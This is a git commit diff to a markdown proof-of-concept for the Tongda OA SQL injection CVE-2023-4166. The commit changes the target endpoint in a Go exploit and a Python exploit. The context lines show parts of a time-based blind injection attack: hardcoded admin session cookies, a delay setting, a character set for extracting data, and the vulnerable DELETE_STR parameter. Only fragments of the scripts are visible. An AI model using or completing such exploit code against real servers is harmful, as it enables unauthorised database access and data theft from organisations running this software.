Update 通达OA sql注入漏洞 CVE-2023-4166.md

2025-02-27 04:39:25 +00:00 · 2023-11-04 22:26:08 +08:00 · 2023-11-04 22:26:08 +08:00 · 96128a6dfc
commit 96128a6dfc
parent 16d885872f
1 changed files with 2 additions and 2 deletions
--- a/CVE-2023-4166.md
+++ b/CVE-2023-4166.md
@ -36,7 +36,7 @@ import (
 // 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞
 func main() {
 // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1  general/system/seal_manage/dianju/delete_log.php
- url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php"                                                                                     // 目标网站的URL
+ url := "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php"                                                                                     // 目标网站的URL
 delay := 2                                                                                                                                                          // 延迟时间，单位为秒
 cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值

@ -106,7 +106,7 @@ headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin;

 characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-"

-url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR="
+url = "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php?DELETE_STR="

 result = ""